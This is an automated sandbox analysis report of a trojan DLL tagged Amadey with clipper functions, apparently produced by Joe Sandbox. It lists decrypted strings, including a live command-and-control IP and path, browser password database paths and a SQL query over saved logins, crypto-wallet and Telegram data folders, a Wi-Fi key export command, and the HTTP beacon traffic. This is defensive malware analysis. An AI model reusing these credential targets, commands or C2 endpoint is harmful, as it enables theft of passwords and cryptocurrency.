Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uLV6jN2BWh.dll

Overview

General Information

Sample name:uLV6jN2BWh.dll
renamed because original name is a hash value
Original sample name:9fcac34b8162651f29288e1ffff9394d.dll
Analysis ID:1542876
MD5:9fcac34b8162651f29288e1ffff9394d
SHA1:68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256:61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
Tags:32Amadeydllexetrojan
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Found potential dummy code loops (likely to delay analysis)
Sample uses string decryption to hide its real strings
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3380 cmdline: loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4744 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 5068 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4668 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6584 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6416 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6408 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5688 cmdline: rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: 185.215.113.217
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: /CoreOPT/index.php
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Mozilla\Firefox\Profiles\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \logins.json
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Exodus\exodus.wallet\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Electrum(
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: electrum_data\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Electrum.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Electrum\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Taskkill /IM ArmoryQt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Litecoin\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Taskkill /IM litecoin-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: DashCore\wallets\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Taskkill /IM dash-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Telegram(
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \user_data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \dictionaries
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: tdata\key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Telegram.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Desktop.zip
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: atomic\Local Storage\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Taskkill /IM "Atomic Wallet.exe" /F
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Google\Chrome\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Google\Chrome\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Opera Software\Opera Stable\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Opera Software\Opera Stable\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Microsoft\Edge\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Microsoft\Edge\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \SputnikLab\Sputnik\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Chromium\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Chromium\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Orbitum\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Orbitum\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Vivaldi\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Vivaldi\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Comodo\Dragon\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Comodo\Dragon\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \CocCoc\Browser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \CocCoc\Browser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Chedot\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \Chedot\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: CentBrowser
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \CentBrowser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \CentBrowser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: netsh wlan export profile name=
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: folder=
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: key=clear
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpackString decryptor: folder=
Source: uLV6jN2BWh.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: uLV6jN2BWh.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB9BCEE FindFirstFileExW,7_2_6FB9BCEE

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB91EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_6FB91EC0
Source: unknownHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php)
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php/J
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php4
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php5Y
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.phpV
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.phpdY
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.phpl
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/NF1d
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB931B07_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FBA1AB17_2_6FBA1AB1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6FB96B05 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6FB973B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6FB95D90 appears 103 times
Source: uLV6jN2BWh.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal56.evad.winDLL@18/0@0/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: uLV6jN2BWh.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,MainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",MainJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: uLV6jN2BWh.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: uLV6jN2BWh.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uLV6jN2BWh.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uLV6jN2BWh.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uLV6jN2BWh.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uLV6jN2BWh.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2307Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7688Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1015Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 8983Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148Thread sleep count: 2307 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148Thread sleep time: -2307000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148Thread sleep count: 7688 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148Thread sleep time: -7688000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152Thread sleep count: 1015 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152Thread sleep time: -1015000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152Thread sleep count: 8983 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152Thread sleep time: -8983000s >= -30000sJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB9BCEE FindFirstFileExW,7_2_6FB9BCEE
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8q8q
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX@

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 42% for more than 60s
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB9A254 mov eax, dword ptr fs:[00000030h]7_2_6FB9A254
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB9B881 mov eax, dword ptr fs:[00000030h]7_2_6FB9B881
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB9D218 GetProcessHeap,7_2_6FB9D218
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB96B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6FB96B1A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB99820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6FB99820

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
